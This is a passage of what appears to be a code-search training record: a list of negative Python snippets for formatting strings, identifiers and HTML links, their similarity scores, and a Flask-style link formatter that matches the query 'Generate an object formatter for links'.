('g', 'G'):\n el = ''\n a = ''\n e = '1'\n elif (s.lower() in ('e-', 'b-', 'bd', 'pc')):\n s = el = 'e-'\n elif ((s.lower() in ('e+', 'b+', 'ec'))\n or ((not element) and (s.lower() == 'pd'))):\n s = el = 'e+'\n elif ((not element) and (s.lower() == 'ps')):\n s = 'h1'\n a = '1'\n el = 'h'\n elif ((not element) and (s.lower() == 'ns')):\n s = 'nt1'\n a = '1'\n el = 'nt'\n el = el.strip()\n# if len(el) == 2 and el(2)\n a = a.strip()\n e = e.strip()\n return s, el, a, e", "def make_python_identifier(string):\n # Todo: check for variable uniqueness\n # perhaps maintain a list of current variables and their translations??\n # Todo: check that the output is actually a valid python identifier\n\n string = string.lower()\n\n # remove leading and trailing whitespace\n string = string.strip()\n\n # Make spaces into underscores\n string = string.replace(' ', '_')\n\n # Make commas and brackets into underscores (mostly for subscript column names)\n string = string.replace(',', '__').replace('[','__')\n\n # Remove invalid characters\n string = 
re.sub('[^0-9a-zA-Z_]', '', string)\n\n # Remove leading characters until we find a letter or underscore\n string = re.sub('^[^a-zA-Z_]+', '', string)\n\n # Check that the string is not a python identifier\n if string in keyword.kwlist:\n string += '_element'\n\n return string", "def getIdentifier(self, length):\n return self._getStr(length)", "def string_ids(f):\n\n\t@functools.wraps(f)\n\tdef wrapper(self, *args):\n\t\treturn f(self, *[str(arg) for arg in args])\n\n\treturn wrapper", "def t_STRING(t):\n return t", "def string_from_invokedymanic(ins, cf):\n info = InvokeDynamicInfo.create(ins, cf)\n if not isinstance(info, StringConcatInvokeDynamicInfo):\n return\n \n return info.recipe", "def encode_fn(s_in):\r\n s_out = s_in.split()\r\n return s_out", "def extract_name():\n def _extract_name(quoted_name):\n return e.String(quoted_name.subexpression.name)\n yield (\"(λ &[name] . str)\", _extract_name)", "def process_id_from(self):\r\n return self._tokens[1]", "def us(self, string=''):\n return string.replace(' ', '_')", "def decode(self, s):", "def decode(self, s):", "def _extract_id(self, dirty_id):\n if dirty_id[:1] == \"/\":\n return dirty_id.split(\"/\")[-1]\n else:\n return dirty_id", "def id(self, tokens):\n if len(tokens) != 1:\n raise Exception(\"Unexpected argument counts\")\n return tokens[0].value", "def get_string(self, **kwargs):\n ...", "def _getvalue_expr_Str(self, expr: ast.Str) -> Any:\n return expr.s", "def transform(self, *args):\n return _libsbml.IdentifierTransformer_transform(self, *args)", "def dense_name(string: str) -> str:\n return \"\".join(string.split(\"_\"))", "def _(string):\n\t\treturn string", "def process_id_to(self):\r\n return self._tokens[3]", "def string_to_index(s):\n s = Unquote(s)\n if s == \".\":\n return ()\n return tuple(s.split(\"/\"))" ]
[ "0.6034306", "0.5799975", "0.5765744", "0.57460624", "0.5699749", "0.5639867", "0.5598918", "0.5493786", "0.5481133", "0.54755294", "0.54505527", "0.5449481", "0.5441116", "0.5371032", "0.5352636", "0.5330441", "0.5291735", "0.5242051", "0.52288747", "0.52288747", "0.52288747", "0.5217174", "0.5172035", "0.5172035", "0.5169953", "0.5163742", "0.5134386", "0.51233023", "0.51216316", "0.51214445", "0.51105213", "0.5081293", "0.5067943", "0.50608945", "0.5059076", "0.5054062", "0.5040261", "0.50320506", "0.5028208", "0.5023658", "0.50209665", "0.5004532", "0.5003816", "0.4993281", "0.49892876", "0.49756178", "0.4962436", "0.495584", "0.49474713", "0.49472144", "0.49375692", "0.49288175", "0.49265495", "0.49137837", "0.49093226", "0.49045956", "0.48956546", "0.48901075", "0.48873535", "0.4881078", "0.48776466", "0.48775756", "0.48632097", "0.4861621", "0.48613435", "0.48586354", "0.48560598", "0.4853348", "0.4852577", "0.48514494", "0.48504713", "0.48493055", "0.4848312", "0.4830739", "0.48275986", "0.4825529", "0.48197076", "0.48177534", "0.48172933", "0.48091263", "0.480745", "0.48066044", "0.4799723", "0.479876", "0.47974417", "0.4790127", "0.4778079", "0.4765839", "0.47647402", "0.47634274", "0.47586876", "0.47586876", "0.47577292", "0.4756921", "0.47470915", "0.47450992", "0.47401515", "0.47368607", "0.4734394", "0.47300136", "0.47279772" ]
0.0
-1
Generate an object formatter for links.
def link(text, link_func): def object_formatter(v, c, m, p): """Format object view link.""" return Markup('<a href="{0}">{1}</a>'.format( link_func(m), text)) return object_formatter
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def object_formatter(v, c, m, p):\n return Markup('<a href=\"{0}\">{1}</a>'.format(\n link_func(m), text))", "def __repr__(self):\n if self.rest:\n rest_repr = ', ' + repr(self.rest)\n else:\n rest_repr = ''\n return 'Link({0}{1})'.format(self.first, rest_repr)", "def linkify(obj, link_text=''):\n try:\n lst = []\n # if obj is not a list, convert it into a list\n if not getattr(obj, '__iter__', False):\n obj = [obj]\n for item in obj:\n if hasattr(item, 'child'):\n item = item.child\n if link_text == '':\n l_text = unicode(item)\n else:\n try:\n link_text = link_text.encode('ascii')\n l_text = getattr(item, link_text, link_text)\n except UnicodeEncodeError:\n l_text = link_text\n if not (isinstance(item, Content) and\n isinstance(l_text, SafeText)):\n l_text = filter.force_escape(l_text)\n format_args = (item.get_absolute_url(), l_text)\n lst.append(mark_safe('<a href=\\'%s\\'>%s</a>' % format_args))\n\n # nonlists obj's should be returned as nonlists\n return lst[0] if len(lst) == 1 else lst\n except:\n return ''", "def fmt(e):\n name = str(e.label.first() if hasattr(e, 'label') and e.label else e)\n if re.match(r'^[a-z]+://', name):\n return link.format(name=name, url=name)\n if hasattr(e, 'label') and e.label:\n name = e.label.first()\n url = name if re.match(r'^[a-z]+://', name) else '#' + name\n return link.format(name=name, url=url)\n elif re.match(r'^[a-z]+://', str(e)):\n return link.format(name=e, url=e)\n else:\n return str(e).replace('owl.', 'owl:')", "def __repr__(self):\n ## return str(self.first) + \" -> \" + repr(self.rest)\n if self.rest is Link.empty:\n rest_str = \"\"\n else:\n rest_str = \", \" + repr(self.rest)\n return \"Link({0}{1})\".format(self.first, rest_str)", "def __str__(self):\n\t\treturn '{0} ({1})'.format (self.name, self.link)", "def format(self, obj):\n pass", "def format(self, obj):\n pass", "def __repr__(self):\n if self.rest is Link.empty:\n rest = ''\n else:\n rest = ', ' + repr(self.rest)\n return 'Link({0}{1})'.format(self.first, rest)", "def format_link_segment(value):\n format_type = json_api_settings.FORMAT_RELATED_LINKS\n return format_value(value, format_type)", "def href(obj):\n if isinstance(obj, Filing):\n return reverse('filing', args=(obj.region, obj.name, obj.period_name))\n else:\n raise ValueError('cannot build a URL for {}.{} objects'.format(\n type(obj).__module__, type(obj).__name__))", "def __str__(self):\n return '<a href=\"%s\" class=\"%s\" %s>%s</a>' % (self.url, self.cssclass, self.options, self.text)", "def to_html(self) -> str:\n return f'''\n <a href=\"{self.link}\"> ({self.source_name}, {self.timestamp.strftime('%Y')}) </a>\n '''", "def linkified_description(self):\n links = []\n def linkify(matchobj, links=links):\n if '|' in matchobj.group(1):\n url = matchobj.group(1).split('|')\n link = format_html('<a href=\"{0}\" target=\"_blank\">{1}</a>', url[0], url[1])\n else:\n link = format_html('<a href=\"{0}\" target=\"_blank\">{1}</a>', self.url, matchobj.group(1))\n links.append(link)\n return '{%d}' % (len(links) - 1)\n\n fmt = re.sub(r'\\[\\[([^\\]]+)\\]\\]', linkify, self.description)\n return format_html(fmt, *links)", "def link(self, obj):\n return format_html(\n '<a href=\"{url}\">{url}</a>',\n url='https://sms.cam.ac.uk/collection/{}'.format(obj.id)\n )", "def linkify(field_name):\n def _linkify(obj):\n linked_obj = getattr(obj, field_name)\n if linked_obj is None:\n return '-'\n app_label = linked_obj._meta.app_label\n model_name = linked_obj._meta.model_name\n view_name = f'admin:{app_label}_{model_name}_change'\n 
link_url = reverse(view_name, args=[linked_obj.pk])\n return format_html('<a href=\"{}\">{}</a>', link_url, linked_obj)\n\n _linkify.short_description = field_name # Sets column name\n return _linkify", "def linkify(field_name):\n\n def _linkify(obj):\n linked_obj = getattr(obj, field_name)\n if linked_obj is None:\n return '-'\n app_label = linked_obj._meta.app_label\n model_name = linked_obj._meta.model_name\n view_name = f'admin:{app_label}_{model_name}_change'\n link_url = reverse(view_name, args=[linked_obj.pk])\n return format_html('<a href=\"{}\">{}</a>', link_url, linked_obj)\n\n _linkify.short_description = field_name # Sets column name\n return _linkify", "def _format_obj(cls, **kwargs):\n def doc_rebuilder(obj):\n if kwargs.pop('_VOID_',False):\n return ''\n try:\n doc = getattr(obj,'__doc__')\n assert doc\n except:\n return ''\n else:\n return doc.format(**kwargs) # str(doc).format(**kwargs)\n return doc_rebuilder", "def generate_link(resources):\n\n links = \"\"\n for i, resource in enumerate(resources):\n link = \"<\" + resource[\"path\"] + \">\"\n if \"parameters\" in resource:\n for parameter in resource[\"parameters\"]:\n link += \";\" + str(parameter) + \"=\" + str(resource[\"parameters\"][parameter])\n links += link\n if i != len(resources) - 1:\n links += \",\"\n return links", "def pretty(self, **kwargs):\r\n raise NotImplementedError", "def gen_links(text):\n return []", "def deriveLinkfromObject(obj, scale=1, parent_link=True, parent_objects=True,\n reparent_children=True, nameformat='', scaleByBoundingBox=False):\n log('Deriving link from ' + nUtils.getObjectName(obj), level=\"INFO\")\n # create armature/bone\n bUtils.toggleLayer('link', True)\n bpy.ops.object.select_all(action='DESELECT')\n bpy.ops.object.armature_add()\n newlink = bpy.context.active_object\n newlink.name = obj.name + \"_link\"\n newlink.matrix_world = obj.matrix_world\n newlink.phobostype = 'link'\n if scaleByBoundingBox:\n bound_box = (\n max([c[0] for c in obj.bound_box]),\n max([c[1] for c in obj.bound_box]),\n max([c[2] for c in obj.bound_box]),\n )\n newlink.scale = [max(bound_box)*scale] * 3\n else:\n newlink.scale = [scale] * 3\n if obj.parent is not None and parent_link:\n eUtils.parentObjectsTo(newlink, obj.parent)\n if parent_objects:\n eUtils.parentObjectsTo(obj, newlink)\n if reparent_children:\n eUtils.parentObjectsTo(list(obj.children), newlink)\n if bpy.context.scene.phoboswireframesettings.links:\n newlink.display_type = \"WIRE\"\n return newlink", "def getLink(self):", "def _format(self):\n output = f\"\\n{color('>>> DUMP')} from {self.filename}: {color(f'L{self.line}')} in {color(f'{self.method}()')}\"\n\n for name, obj in self.objects.items():\n output += f\"\\n\\n{color(f' - {name}:')}\\n\"\n output += f\" {pformat(obj, width=110, indent=4)}\"\n\n output += color(\"\\n\\n<<< END\")\n return output", "def format(self):\n ...", "def format_element(bfo, links=\"no\", category=\"yes\", mirrors=\"yes\"):\n\n arxiv=get_arxiv(bfo, category=\"no\")\n\n if len(arxiv) == 0:\n return\n\n out = ''\n if links == 'yes':\n arxiv_ref = arxiv[0] # Take only first one\n out += '''\n<a href=\"http://arXiv.org/abs/%(ref)s\">Abstract</a> and\n<a href=\"http://arXiv.org/ps/%(ref)s\">Postscript</a>\n and <a href=\"http://arXiv.org/pdf/%(ref)s\">PDF</a> from arXiv.org'''% \\\n {'ref': arxiv_ref}\n\n if mirrors.lower()=='yes':\n out+='''\n (mirrors:\n<a href=\"http://au.arXiv.org/abs/%(ref)s\">au</a>\n\n<a href=\"http://br.arXiv.org/%(ref)s\">br</a>\n<a 
href=\"http://cn.arXiv.org/abs/%(ref)s\">cn</a>\n<a href=\"http://de.arXiv.org/abs/%(ref)s\">de</a>\n<a href=\"http://es.arXiv.org/abs/%(ref)s\">es</a>\n<a href=\"http://fr.arXiv.org/abs/%(ref)s\">fr</a>\n<a href=\"http://il.arXiv.org/abs/%(ref)s\">il</a>\n<a href=\"http://in.arXiv.org/abs/%(ref)s\">in</a>\n<a href=\"http://it.arXiv.org/abs/%(ref)s\">it</a>\n<a href=\"http://jp.arXiv.org/abs/%(ref)s\">jp</a>\n<a href=\"http://kr.arXiv.org/abs/%(ref)s\">kr</a>\n<a href=\"http://ru.arXiv.org/abs/%(ref)s\">ru</a>\n<a href=\"http://tw.arXiv.org/abs/%(ref)s\">tw</a>\n<a href=\"http://uk.arXiv.org/abs/%(ref)s\">uk</a>\n<a href=\"http://aps.arXiv.org/abs/%(ref)s\">aps</a>\n<a href=\"http://lanl.arXiv.org/abs/%(ref)s\">lanl</a>)''' % \\\n {'ref': arxiv_ref}\n\n\n else: # print only value\n out = ', '.join(get_arxiv(bfo,category))\n\n return out", "def __str__(self, printODData = False):\n networkStr = \"Link\\tFlow\\tCost\\n\"\n for ij in sorted(self.link, key=lambda ij : self.link[ij].sortKey):\n networkStr += \"%s\\t%f\\t%f\\n\" % (ij, self.link[ij].flow, self.link[ij].cost)\n if printODData == True:\n networkStr += \"\\n\"\n networkStr += \"OD pair\\tDemand\\tLeastCost\\n\"\n for ODpair in self.ODpair:\n networkStr += \"%s\\t%f\\t%f\\n\" % (ODpair, self.ODpair[ODpair].demand, self.ODpair[ODpair].leastCost)\n return networkStr", "def detail_link(db_obj, text=None):\n\n def build_link(obj):\n name = str(obj) if text is None else text\n return _make_link(obj.detail_url(), name)\n\n return mark_safe(', '.join(map(build_link, as_list(db_obj))))", "def undo_format_link_segment(value):\n\n if json_api_settings.FORMAT_RELATED_LINKS:\n return format_value(value, \"underscore\")\n\n return value", "def format(obj): # pylint: disable=W0622\n# print '>>', obj\n if hasattr(obj, 'format'):\n return obj.format()\n return \"%s\" % obj", "def pybb_link(object, anchor=''):\n\n url = hasattr(object, 'get_absolute_url') and object.get_absolute_url() or None\n #noinspection PyRedeclaration\n anchor = anchor or smart_text(object)\n return mark_safe('<a href=\"%s\">%s</a>' % (url, escape(anchor)))", "def _generate_links(self):\n index = 0\n links = \"\"\n for ch in self.text:\n if ch == '[':\n links += \"(^\"\n elif ch == ']':\n links += \")$|\"\n index += 1\n elif links[-1:] != '|' and links != \"\":\n links += ch\n self.links = compile(links[:-1].lower())", "def exportLineageLink(fromObject, toObject, linkType, csvFile):\n # TODO: add error checking\n row = [linkType, \"\", \"\", fromObject, toObject]\n csvFile.writerow(row)\n return", "def __str__(self) -> str:\n obj_dict: Dict[str, Any] = {}\n obj_dict[\"doc\"] = self.doc\n obj_dict[\"type\"] = self.type\n obj_dict[\"name\"] = self.name\n\n line_range = self.line_range()\n obj_dict[\"start_line\"] = line_range[0]\n obj_dict[\"end_line\"] = line_range[1]\n\n obj_dict[\"children\"] = []\n\n for child in self.children.values():\n obj_dict[\"children\"].append(json.loads(str(child)))\n\n return json.dumps(obj_dict)", "def format_element(bfo, style, separator='; ', elec_loc_field='1'):\n\n urls = []\n coll = bfo.field('960__a')\n\n if '1' in elec_loc_field:\n urls = bfo.fields('8564_')\n\n if '2' in elec_loc_field:\n urls.extend(bfo.fields('85642'))\n\n out = []\n\n if style != \"\":\n style = 'class=\"'+style+'\"'\n\n for url in urls:\n if coll in ['31', '32'] and \\\n url.get('x', '') == 'map':\n # Periodicals\n continue\n\n elif coll in ['74', '75'] and \\\n 'BUL-SA-' not in bfo.field('037__a') and \\\n bfo.field('088__a'):\n # Weekly bulletin\n continue\n\n\n elif 
url.has_key('u'):\n\n label = url.get('y', '')\n if coll in ['60', '61', '62', '63', '69'] or \\\n coll in ['81', '82', '83', '84', '86','87','88', '89', '115', '117']:\n # Council documents +\n # Photos\n label = escape(url.get('z', ''))\n if label.lower() in ['', 'access to fulltext document', 'access to document', 'full text']:\n label = \"Fulltext\"\n if label.lower() in ['audio files']:\n label = '<img src=http://cdsweb.cern.ch/img/speaker.png border=\"0\">' + \\\n label\n\n\n link = '<a ' + style + ' href=\"' + url['u'] + '\">' + \\\n label + '</a>'\n out.append(link)\n\n if coll == '05':\n file_numbers = bfo.field('927__a')\n for file_number in file_numbers:\n if '-' in file_number or '_' in file_number:\n link = '<a href=\"http://doc.cern.ch/cgi-bin/setlink?base=pauli&amp;categ=&amp;id=\"%s\">Fulltext</a>' % file_number\n out.append(link)\n\n if coll in ['74', '75'] and \\\n 'BUL-SA-' not in bfo.field('037__a') and \\\n bfo.field('088__a'):\n # Weekly bulletin\n link = 'Published in <a href=\"http://bulletin.cern.ch/eng/bulletin.php?bullno=' + \\\n bfo.field('088__a') +'\">CERN weekly bulletin ' + bfo.field('088__a') + '</a>' + \\\n ' (' + bfo.field('260__c') + ')'\n out.append(link)\n\n return separator.join(out)", "def render(links, enum=False):\n if not enum:\n return \"\\n\".join(links)\n return \"\\n\".join(\"%s. %s\" % ((i + 1), l) for i, l in enumerate(links))", "def htmlize(self, obj, rooturl):\n\n\t\tif isinstance(obj, basestring):\n\t\t\tif obj.startswith(\"@\"):\n\n\t\t\t\t# Button link...\n\t\t\t\ttry:\n\t\t\t\t\tmod, ns, objid, value = obj[1:].split(\":\")\n\t\t\t\texcept ValueError:\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\ttarget_url = rooturl + mod + \"/\" + ns + \"/\" + objid\n\t\t\t\t\tfl = \"<form method=\\\"post\\\" action=\\\"\" + cgi.escape(target_url, True)\n\t\t\t\t\tfl += \"\\\"><input type=\\\"submit\\\" name=\\\"cmd\\\" value=\\\"\"\n\t\t\t\t\tfl += cgi.escape(value, True) + \"\\\"/></form>\"\n\t\t\t\t\treturn fl\n\n\t\t\tif obj == '':\n\t\t\t\treturn \"<br/>\"\n\n\t\t\treturn cgi.escape(obj)\n\n\t\tif isinstance(obj, list):\n\t\t\tout = \"</li><li>\".join(self.htmlize(item, rooturl) for item in obj)\n\t\t\treturn \"<ul><li>\" + out + \"</li></ul>\"\n\n\t\tif isinstance(obj, tuple):\n\t\t\tout = \"\".join(self.htmlize(item, rooturl) for item in obj)\n\t\t\treturn out\n\t\t\t#return \"<p>\" + out + \"</p>\"\n\n\t\tif isinstance(obj, dict) or isinstance(obj, weakref.WeakValueDictionary):\n\t\t\tout = \"</li><li>\".join(\n\t\t\t\t\"<b>\" + cgi.escape(repr(k)) + \"</b>: \" + self.htmlize(obj[k], rooturl)\n\t\t\t\tfor k\n\t\t\t\tin sorted(obj.iterkeys())\n\t\t\t)\n\t\t\treturn \"<ul><li>\" + out + \"</li></ul>\"\n\n\t\tif hasattr(obj, '_chiral_introspect') \\\n\t\t and hasattr(obj._chiral_introspect, 'im_self') \\\n\t\t and obj._chiral_introspect.im_self is not None:\n\t\t\treturn \"<a href=\\\"\" + cgi.escape(\n\t\t\t\trooturl + obj._chiral_introspect.__module__ + (\"/%s/%s\" % obj._chiral_introspect())\n\t\t\t) + \"\\\">\" + cgi.escape(repr(obj)) + \"</a>\"\n\n\t\treturn \"<i>\" + cgi.escape(repr(obj)) + \"</i>\"", "def link(self):\n return f\"[{self.numbered_title}]({self.html_url})\"", "def pformat(object):\r\n return PrettyPrinter().pformat(object)", "def links(self):\n return self._links_tpl.expand(self._identity, self._record)", "def _format_to_link(self, commit):\n return os.path.join(self.mount, \"commits-by-hash\", self._hash_updir(commit), commit) + \"/\"", "def formatArrayHyperlink(txt, lnk, filename):\n if 
oapackage.oahelper.oaIsBinary(filename):\n ss = e.a(txt + e.small(\" (binary)\"), href=lnk, class_=\"binarylink\")\n else:\n ss = e.a(txt, href=lnk, class_=\"normal\")\n return ss", "def __repr__(self):\n\n return '%s(%s)' % (self, self._format_entries(),)", "def get_pretty_links(self, source):\n data = self.get_links(source)\n to_return = []\n for ind in data:\n if ind == '':\n continue\n if len(ind[2]) > 300:\n ind[2] = ind[2][:297] + '...'\n to_return.append([ind[1], ind[2], ind[3][0], ind[3][1]])\n if source == 'twitter':\n to_return[-1].append(ind[3][2])\n return to_return", "def comma_seperated_admin_links(objs):\n anchors = []\n for obj in objs:\n anchors.append('<a href=\"%s\">%s</a>' % (get_obj_admin_path(obj), obj.title))\n return ', '.join(anchors)", "def __str__(self):\n table = 'objects'.join(self.galcat.__str__().split('objects')[1:])\n return self.__repr__()+'\\n'+table", "def url(self):\n if self.term_type != 'C':\n url_fmt = self.path_level_url_fmt\n url_info = {'id': self.term_type}\n else:\n url_fmt = self.obj_level_url_fmt\n url_info = {'org_prefix': self.org_prefix, 'id': self.term_id}\n\n return url_fmt % url_info", "def to_html(obj):\n return highlight(\"json\", json.dumps(obj, sort_keys=False, indent=4))", "def format_link(self):\n self.url = sys.argv[1]\n video_link_regex = re.compile(\n r'(https?://)?(www\\.)?youtube\\.(com|nl)/watch\\?v=([\\w-]+)')\n playlist_link_regex = re.compile(\n r'(https?://)?(www\\.)?youtube\\.(com|nl)/playlist\\?list=([\\w-]+)')\n # check if it's a single video link\n if video_link_regex.search(self.url):\n result_regex = video_link_regex.search(self.url)\n self. url = result_regex.group().split('&')[0]\n self.show_formats()\n # check if it's a playlist link\n elif playlist_link_regex.search(self.url):\n logging. debug('Yes it a playlist')\n result_regex = playlist_link_regex.search(self.url)\n playlist_link = result_regex.group().split('&')[0]\n self. get_videos_in_playlist()\n # check if link is not a youtube link\n else:\n logging.debug('Not even a yt link')\n sys. 
exit()", "def formatted(self) -> str:\r\n ...", "def __repr__ (self):\n\t\t# return (\"%s %s\" % (self.name, self.ppDate (self.modtime)))\t\n\t\tlabel = self.name\n\t\tif self.islink:\n\t\t\tlabel = \"%s (link)\" % label\n\t\tif self.isalias:\n\t\t\tlabel = \"%s (alias)\" % label\n\t\ts = ''\n\t\tif 0:\n\t\t\ts = \"%s%s (%s)\" % (myglobals.getIndent(self.level), \n\t\t\t\t\t\t\t\t self.compactDate (self.modtime),\n\t\t\t\t\t\t\t\t self.name)\n\t\t\ts += \"\\n\\t%s - \"\n\t\ts += \"%s - %s (%s)\" % (self.compactDate(self.firstTime),\n\t\t\t\t\t\t\t\t self.compactDate(self.lastTime),\n\t\t\t\t\t\t\t\t self.compactDate(self.lastLine))\n\t\treturn s;", "def format_value(obj, field_name):\n display_func = getattr(obj, 'get_%s_display' % field_name, None)\n if display_func:\n return display_func()\n value = getattr(obj, field_name)\n\n if isinstance(value, models.fields.files.FieldFile):\n if value:\n return mark_safe('<a href=\"%s\">%s</a>' % (\n value.url,\n os.path.basename(value.name),\n ))\n else:\n return ''\n\n if isinstance(value, models.Model):\n return format_value_instance(value)\n\n if isinstance(value, models.Manager):\n return mark_safe(', '.join(\n [format_value_instance(instance) for instance in value.all()]\n ))\n if value is None:\n value = \"\"\n return value", "def generate_link_kml(self, d):\n return \"\"\"\\\n <NetworkLink>\n <name>%(image_filename)s</name>\n <Region>\n <Lod>\n <minLodPixels>%(minlodpixels)d</minLodPixels>\n <maxLodPixels>-1</maxLodPixels>\n </Lod>\n <LatLonAltBox>\n <north>%(north).14f</north>\n <south>%(south).14f</south>\n <east>%(east).14f</east>\n <west>%(west).14f</west>\n </LatLonAltBox>\n </Region>\n <Link>\n <href>%(link_url)s</href>\n <viewRefreshMode>onRegion</viewRefreshMode>\n </Link>\n </NetworkLink>\"\"\" % d", "def render(objects,\n output_encoding,\n title_force_uppercase,\n msdos_eol_style,\n omit_fields_mapping={}):", "def link(self, obj):\n return format_html(\n '<a href=\"{url}\">{url}</a>',\n url='https://sms.cam.ac.uk/media/{}'.format(obj.id)\n )", "def format(self, obj):\n return json.dumps(obj, sort_keys=True, indent=4, separators=(',', ': '))", "def _object2style(self, selector, token):\r\n\r\n obj = self._object2style_helper(\"\", token)\r\n # insert items in the order they were found in the document\r\n minify = True\r\n if not minify:\r\n arr = [\" %s: %s;\" % (k, v) for k, v in obj.items()]\r\n body = \"\\n\".join(arr)\r\n return \"%s {\\n%s\\n}\" % (selector, body)\r\n else:\r\n arr = [\"%s:%s\" % (k, v) for k, v in obj.items()]\r\n body = \";\".join(arr)\r\n return \"%s {%s}\" % (selector, body)", "def __repr__(self):\n format_string = self.__class__.__name__ + '('\n for t in self.transforms:\n format_string += f'\\n {t}'\n format_string += '\\n)'\n return format_string", "def append_links(self, lines, lang):\n lines.append(\"verbatim &nbsp;\")\n lines.append(\"section Links\")\n lines.append(\"external http://polcasaglia.blogspot.com Blog\")\n lines.append(\"external http://www.uisp-fe.it/calcio.php UISP\" )\n lines.append(\"verbatim &nbsp;\")\n return lines", "def reportLink(self, citName, end1, end2):\n assert citName and end1 and end2\n osh = ObjectStateHolder(citName)\n osh.setAttribute(\"link_end1\", end1)\n osh.setAttribute(\"link_end2\", end2)\n return osh", "def to_markdown(self):\n s = \"[\" + self.label + \"]\"\n if self.is_reflink:\n s += \": \" + self.url\n else:\n s += \"(\" + self.url + \")\"\n return s", "def __html__(self) -> str:\n components = [\n self.attributee_html,\n f'\"{self.linked_title}\"',\n 
self.date.string if self.date else '',\n ]\n return self.components_to_html(components)", "def makeBackrefLink(self, info, g_links, i):\n atts, content, infoid, link = '', '', '', ''\n if 'def' in info:\n link = info['def']['link']\n backlink_type = link or g_links\n i_ = self.encode_high(i)\n allow_inc = i not in self.syms\n i_ = int(i_)\n\n if backlink_type == \"!\":\n return ''\n elif backlink_type == '^':\n return \"\"\"<sup><a href=\"#noteref%s\">%s</a></sup>\"\"\" % (\n info['refids'][0], i\n )\n else:\n result = []\n for refid in info['refids']:\n i_entity = self.decode_high(i_)\n sup = \"\"\"<sup><a href=\"#noteref%s\">%s</a></sup>\"\"\" % (\n refid, i_entity\n )\n if allow_inc:\n i_ += 1\n result.append(sup)\n result = ' '.join(result)\n return result", "def parseDocObjectsToStrings(records, obj_type):\n for doc in records:\n for key, value in doc.items():\n # all dates should look the same\n if isinstance(value, datetime.datetime):\n doc[key] = datetime.datetime.strftime(value,\n \"%Y-%m-%d %H:%M:%S\")\n if key == \"_id\" or key == \"id\":\n doc[\"recid\"] = str(value)\n doc[\"details\"] = \"<a href='\"+getHREFLink(doc, obj_type)+\"'>\"\\\n \"<div class='icon-container'>\"\\\n \"<span class='ui-icon ui-icon-document'></span>\"\\\n \"</div>\"\\\n \"</a>\"\n elif key == \"password_reset\":\n doc['password_reset'] = None\n elif key == \"campaign\":\n camps = []\n for campdict in value:\n camps.append(campdict['name'])\n doc[key] = \"|||\".join(camps)\n elif key == \"source\":\n srcs = []\n for srcdict in doc[key]:\n srcs.append(srcdict['name'])\n doc[key] = \"|||\".join(srcs)\n elif key == \"tags\":\n tags = []\n for tag in doc[key]:\n tags.append(tag)\n doc[key] = \"|||\".join(tags)\n elif key == \"is_active\":\n if value:\n doc[key] = \"True\"\n else:\n doc[key] = \"False\"\n elif key == \"tickets\":\n tickets = []\n for ticketdict in value:\n tickets.append(ticketdict['ticket_number'])\n doc[key] = \"|||\".join(tickets)\n elif key == \"datatype\":\n doc[key] = value.keys()[0]\n elif key == \"to\":\n doc[key] = len(value)\n elif key == \"thumb\":\n doc['url'] = reverse(\"crits.screenshots.views.render_screenshot\",\n args=(unicode(doc[\"_id\"]),))\n elif key==\"results\" and obj_type == \"AnalysisResult\":\n doc[key] = len(value)\n elif isinstance(value, list):\n if value:\n for item in value:\n if not isinstance(item, basestring):\n break\n else:\n doc[key] = \",\".join(value)\n else:\n doc[key] = \"\"\n doc[key] = html_escape(doc[key])\n value = doc[key].strip()\n if isinstance(value, unicode) or isinstance(value, str):\n val = ' '.join(value.split())\n val = val.replace('\"',\"'\")\n doc[key] = val\n return records", "def __str__(self):\n return self.getBooksString() + \"\\n\" + self.getPatronsString()", "def user2Link(user): \n # could also look up mail addrs via a table lookup, etc\n return '<a href=\"mailto:%(user)s@somewebsite.com\">%(user)s</a>' % {\"user\": user}", "def format(self) -> str:", "def format_item_display(self, obj):\n return u\"%s - %s\" % (escape(obj.nombre),obj.rfc)", "def get_links(self, obj):\n request = self.context['request']\n detail_name = '{}-detail'.format(get_model_name(obj.__class__))\n return {\n 'self': reverse(detail_name, kwargs={'pk': obj.pk}, request=request),\n }", "def xml_add_links(cls, data):\n xml = \"\"\n chunk = '<link rel=\"%s\" href=\"%s\" title=\"%s\" />'\n links = data.pop(config.LINKS, {})\n ordered_links = OrderedDict(sorted(links.items()))\n for rel, link in ordered_links.items():\n if rel == \"related\":\n # add data relation 
links back for\n # future processing of hateoas attributes\n data.update({config.LINKS: {rel: link}})\n\n elif isinstance(link, list):\n xml += \"\".join(\n chunk % (rel, escape(d[\"href\"]), escape(d[\"title\"]))\n for d in link\n )\n else:\n xml += \"\".join(chunk % (rel, escape(link[\"href\"]), link[\"title\"]))\n return xml", "def make_to_string(front, mid, back, empty_repr):\n \"*** YOUR CODE HERE ***\"\n def printer(lnk):\n if lnk == Link.empty:\n return empty_repr\n else:\n return front + str(lnk.first) + mid + printer(lnk.rest) + back\n return printer", "def custom_links(context, obj):\n content_type = ContentType.objects.get_for_model(obj)\n custom_links = CustomLink.objects.filter(content_types=content_type, enabled=True)\n if not custom_links:\n return ''\n\n # Pass select context data when rendering the CustomLink\n link_context = {\n 'object': obj,\n 'debug': context.get('debug', False), # django.template.context_processors.debug\n 'request': context['request'], # django.template.context_processors.request\n 'user': context['user'], # django.contrib.auth.context_processors.auth\n 'perms': context['perms'], # django.contrib.auth.context_processors.auth\n }\n template_code = ''\n group_names = {}\n\n for cl in custom_links:\n\n # Organize custom links by group\n if cl.group_name and cl.group_name in group_names:\n group_names[cl.group_name].append(cl)\n elif cl.group_name:\n group_names[cl.group_name] = [cl]\n\n # Add non-grouped links\n else:\n try:\n rendered = cl.render(link_context)\n if rendered:\n template_code += LINK_BUTTON.format(\n rendered['link'], rendered['link_target'], cl.button_class, rendered['text']\n )\n except Exception as e:\n template_code += f'<a class=\"btn btn-sm btn-outline-dark\" disabled=\"disabled\" title=\"{e}\">' \\\n f'<i class=\"mdi mdi-alert\"></i> {cl.name}</a>\\n'\n\n # Add grouped links to template\n for group, links in group_names.items():\n\n links_rendered = []\n\n for cl in links:\n try:\n rendered = cl.render(link_context)\n if rendered:\n links_rendered.append(\n GROUP_LINK.format(rendered['link'], rendered['link_target'], rendered['text'])\n )\n except Exception as e:\n links_rendered.append(\n f'<li><a class=\"dropdown-item\" disabled=\"disabled\" title=\"{e}\"><span class=\"text-muted\">'\n f'<i class=\"mdi mdi-alert\"></i> {cl.name}</span></a></li>'\n )\n\n if links_rendered:\n template_code += GROUP_BUTTON.format(\n links[0].button_class, group, ''.join(links_rendered)\n )\n\n return 